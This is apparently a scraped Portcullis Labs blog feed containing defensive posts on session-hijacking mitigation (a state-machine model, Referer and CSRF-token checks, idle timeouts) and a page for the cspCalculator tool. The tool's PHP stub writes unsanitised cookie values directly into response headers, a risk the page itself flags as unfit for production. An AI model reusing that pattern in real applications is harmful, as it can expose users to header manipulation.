  • If the users leaves the application unattended, the session will be closed after the idle time (at least as long as the session time out but no more than 10 minutes).
  • While the user is working with the application, the session will be remain active.

A last improvement would be to use a variable time out. So it could be configured to the same period as the session time out in most cases but could also be increased for those pages which will take longer to read.

Editor’s note: If you enjoyed our two articles on how to improve session management, we’ve asked the author to put together a good practice guide detailing these and other practical steps that can be employed to help keep your users safe.

The post Improving the security in web sessions (part 2) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/feed/ 0
Improving the security in web sessions (part 1) https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/ https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/#comments Thu, 09 Jan 2014 14:14:18 +0000 https://labs.portcullis.co.uk/?p=2012 Session management is a crucial part of web applications and therefore it is also the target of numerous kinds of attacks. Critical web applications, such as banking applications, require complete control of the users’ sessions to prevent abuses or session hijacking attacks. One way to complicate these types of attack, is for the web application […]

The post Improving the security in web sessions (part 1) appeared first on Portcullis Labs.

]]>
Session management is a crucial part of web applications and therefore it is also the target of numerous kinds of attacks. Critical web applications, such as banking applications, require complete control of the users’ sessions to prevent abuses or session hijacking attacks.

One way to complicate these types of attack, is for the web application to have the complete control of the user session. Typically web applications use a session token, normally in the form of a cookie, to identify sessions but they do not normally check anything else to verify the legitimacy of the session. So if an attacker can retrieve the token used by an authenticated user in some manner, usually the attacker can steal the victim’s session by sending the retrieved token within each request.

However, if the web application tightly controls the state of the user inside the application, it would be very difficult for an attacker to steal his session if the user is still interacting with it. Let me explain it with an example:

Imagine an application whose flow can be represented with the following diagram:

FlowDiagram
image-2013

In the initial state, users would not be logged into the application and, until they do so, they will stay in that state. After a login to the application, they get access to the private area of the application where there are 3 different pages. From any of those pages, the user can finish their session by going to the logout page. Inside the private area, users only can browse the pages in the order: 1 -> 2 -> 3 -> 1 -> 2 … Any other interaction which is not represented by an arrow in the diagram would not be allowed (for example, going from 2 to 1).

In this context, each session could be represented by the usual session token and the state which the user is in. Doing that, if an attacker was able to retrieve the token in order to attempt to gain access to the application, they would try to access a random state which potentially wouldn’t correspond with any of the following valid states.

For example, if the legitimate user is in the state “Private Page 1″ at the moment of the attack, the only 2 possible next states are “Private Page 2″ and “Log out”. An attacker would need to know this and if they did not, the application could detect the attack and invalidate the session. It is true, that this can be done by exploiting other vulnerabilities, such as a Cross-site Scripting in the application, but if so, the application will store that the new user state is, for example “Private Page 2″. Therefore, when the legitimate user tries to get access to the next state (remember that they were actually in the “Private Page 1″ state), the application will detect the irregularity and will terminate the session.

Hence, although the attacker would be able to retrieve the token and to perform several requests by discovering the state of the user, the application will identify the problem if the user continues using the application and the states of the user and the attacker become desynchronised.

In this scenario, an attacker who successfully locates another suitable vulnerability in the web application (the XSS talked above) might be able to identify the state of the user, allowing them to retrieve the token and the state and to refresh the web browser of the user by changing the session token. By doing so, the attacker would be able to use the session but the user will detect that something weird happened as their session will likely be terminated.

To avoid this situation, the application should protect against the use of concurrent logins. So when the legitimate user logs in again, the application will detect the second session of the same user and will terminate both sessions.

A limitation of this solution is that legitimate users cannot have more than one tab in the same browser on the same application because each tab would be in different states causing the application to identify the scenario as a possible attack and terminate an otherwise legitimate session. Browsers’ navigation buttons (back and forward) would provoke the same eventualities because the user could change between states in the client side “bypassing” the control of the web application.

In order to implement this, the server side application would need to be designed like a state machine where all the relationships between the states are defined. The application will need, therefore, to store the current state of the user inside his session and to check that every request came from the current state and that it is addressed to any of the states which are accessible from the current.

The tokens used to mitigate Cross-site Request Forgery (CSRF) attacks could be used to check the state where the users come from. If the token received by the application with each request matches the token sent to the user previously, this means that the user is coming from a valid state. One of the problem with this approach is that all the requests will need to include the CSRF token (including GET requests) and most libraries do not allow this check for GET requests. Another problem of the usage of the CSRF token is that the solution implemented by many frameworks consists uses one unique token which is sent through all the application but which does not change between requests. In this instance, it would not be possible to differentiate between two different states.

A different approach could be to check the HTTP header “Referer” from each request. In this case, the state could be represented by the URL from where the user is navigating from (remember that this header cannot be trivially manipulated by using JavaScript – only the web browser has access to it). Alternatively, instead of the “Referer” header, an extra hidden field could be added in each form and link which saves the state and preserves it between requests.

Each approach has its benefits and its problems so probably a mixed solution would be better, using the CSRF to preserve the valid states between requests and checking the “Referer” HTTP header to check previous states.

So, summarising:

  • Web session security can be improved by understanding web applications like a state machine and checking the state of each user in each request.
  • Advantages: this approach prevents and/or complicate attacks to the session, such as session hijacking. Furthermore, it might complicate the usage of guessable/default accounts if another user is using it because concurrent sessions must be avoided.
  • Disadvantages: users cannot use the application in different tabs and the interaction with it is limited to the actions offered in each page, rejecting the usage of web browsers navigation buttons.
  • Two possible implementation consist of checking the “Referer” HTTP header and/or the CSRF token sent within each request.

In the next post, I will address another problem relating to web sessions management, how to identify when an user is no longer using the application, and how to close the session as soon as possible.

The post Improving the security in web sessions (part 1) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/feed/ 0
cspCalculator https://labs.portcullis.co.uk/tools/cspcalculator/ https://labs.portcullis.co.uk/tools/cspcalculator/#comments Wed, 08 Jan 2014 15:35:09 +0000 https://labs.portcullis.co.uk/?p=1110 cspCalculator is a PoC implementation of a dynamic Content Security Policy creator. Key features Allows on the fly manipulation of Content Security Policy Enables UX developers to get visual feedback on how a CSP affects the application functionality Minimises the changes required to an existing application to allow this to happen Overview Content Security Policies […]

The post cspCalculator appeared first on Portcullis Labs.

]]>
cspCalculator is a PoC implementation of a dynamic Content Security Policy creator.

Key features

  • Allows on the fly manipulation of Content Security Policy
  • Enables UX developers to get visual feedback on how a CSP affects the application functionality
  • Minimises the changes required to an existing application to allow this to happen

Overview

Content Security Policies are a new feature of modern browsers that support HTML 5 designed to augment the traditional Same Origin Policy of browsers and help to limit the potential impact of Cross-site Scripting and other content manipulation vulnerabilities that may exist within a given web site and which could be exploited by an attacker. It allows allows web site owners to declare approved sources of content that browsers should be allowed to load on that page out-of-band through the use of additional HTTP headers.

The aim here is to minimise the leg work for UX developers in creating web applications that both function and utilise secure development practices. We do this by reducing the server side code changes down to the injection of some client side JavaScript along with a few lines of server side stub code (in this case, in PHP). Once this has been integrated into application in a staging environment, the UX developer can tweak the CSP from their own browser and see how it affects the application functionality :).

Installation

  • Copy styles and js from src/html to your web root
  • Copy index.php from src/html/examples/php to your web root or tweak your existing web pages in a similar fashion

Usage

The client side code (HTML) should include the following changes:

<head>
...
	<link rel="stylesheet" href="styles/cspCalculator.css" type="text/css"/>
...
</head>
<body>
	<script src="js/cspCalculator.js"></script>
	...
</body>

This will result in the CSS and JavaScript used to construct the cspCalculator UI being injected into resultant pages.

Additionally, as a minimum case, the server side code should implement the following logic:

$directiveslist = array("default-src", "connect-src", "font-src", "frame-src", "img-src", "media-src", "object-src", "script-src", "style-src", "sandbox");
$headerslist =  array("Content-Security-Policy", "X-Content-Security-Policy", "X-WebKit-CSP");
foreach ($directiveslist as $directivename) {
	header("Set-Cookie: " . $directivename . "=" . $_COOKIE[$directivename], false);
}
foreach ($headerslist as $headername) {
	$headervalue = "";
	foreach ($directiveslist as $directivename) {
		$headervalue .= "; " . $directivename . " " . $_COOKIE[$directivename];
	}
	header($headername . ": " . $headervalue);
}

We use cookies as a back channel to allow changes to the Content Security Policy by the UX developer from the UI to easily be signaled back to the web application so that the appropriate headers can be set. Cookies work nicely for this purpose as they do not interfere with any GET or POST parameters that the application may need to send for normal operation.

Once operational, your web application will now include a drop down cspCalculator box on each of its pages. Within the drop down you will see various text boxes for each of the CSP directives that can be defined. The “Calculate” button next to each will attempt to determine the appropriate policy by examining the page’s DOM (something that isn’t 100% effective yet). The “Apply” button will force a round-trip to the server to force it to send the page with the new CSP headers applied. It is recommended that you use this tool in combination with something such as Chrome’s Inspect Element feature to identify any DOM elements that are blocked and which cspCalculator is unable to identify automatically.

cspCalculator should not be deployed in a production environment, since the setting of cookies and/or a CSP by use of header() calls may itself introduce other classes of vulnerability. Rather, once the appropriate CSP has been identified it should be set statically through the use of header() (as in PHP) or other similar calls.

Examples

Since cspCalculator isn’t particularly easy to demonstrate in a static context, a demo version has been deployed for your amusement. This can be found on at www.cspcalculator.org. It has been presented on a separate domain to minimise the risks outlined above in the Usage section of this page.

CspCalculator-0.2 Tar
cspCalculator-0.2.tar.gz
November 29, 2013
14.2 KiB
MD5 hash: 496b55e3ffa575178428d1d85e42e113
Details

The post cspCalculator appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/tools/cspcalculator/feed/ 0